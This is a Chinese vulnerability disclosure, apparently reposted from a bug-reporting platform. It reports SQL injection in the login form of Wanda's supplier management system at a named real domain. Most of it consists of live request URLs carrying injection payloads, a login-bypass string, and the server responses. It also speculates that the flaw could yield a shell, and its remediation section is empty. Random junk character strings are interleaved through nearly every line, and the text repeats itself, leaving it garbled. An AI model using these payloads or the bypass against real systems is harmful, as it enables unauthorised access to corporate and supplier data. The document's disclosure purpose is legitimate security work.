万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
万达scm系统登陆框sql注入。
0 X& C5 f- T# v" V9 o% I1 t0 p
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
  U0 i! \9 W6 }8 @' P0 k3 j% |

7 M  C0 Q- S" G; m) K. v; o# e( c500错误。
, o4 t8 s, j: t* H* c) d
/ \2 m7 J4 d/ M. E& ~% _用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
% H6 y; S% A1 Y# b" C$ c$ z& D6 jhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
/ I( T/ m7 H; y+ o0 q8 f0 g) G截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

% S& V5 K( [, [$ N; T6 qoracle数据库，存在注入点。@大连万达，你怎么看？
- J# P% s5 H! ~  ?! ohttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
漏洞证明：
万达scm系统登陆框sql注入。
+ \$ c5 Q, p& L* A- r: q
2 \9 b+ E7 G0 |- a5 i3 `, Jhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

$ a! ?1 r9 N6 k. u$ [
) s  E" X1 o% M# N500错误。
; O# f) _  P+ x9 K: ]
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
5 t5 L/ Y- i, c2 B0 ]' m! z& I2 Hhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png

3 |+ v0 }9 L; w7 H: Q  O* R
（截图有一点问题）

怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

4 ?) Q1 G& k8 x* R" r9 ?取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。

绕过：
6 G/ y. T" B5 L1 {4 ?4 Yhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1

" M9 e; _( g2 G& P5 U# W8 f
# W9 J& i/ c- z& `7 coracle数据库，存在注入点。@大连万达，你怎么看？
# n4 @# i6 e: {! _" M! S​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。
3 R1 R1 `6 e% k
修复方案：
5 A3 D  i5 _( @2 B+ }: `' V9 _。。。
, G  n9 T* r7 U$ W
2 K" {$ R) g& |+ E
厂商已经确认
5 u9 g, Z) J7 w) Q
# V3 o0 \6 `$ g1 A3 s% A6 a/ S6 b$ o0 }[/td][/tr]
[/table]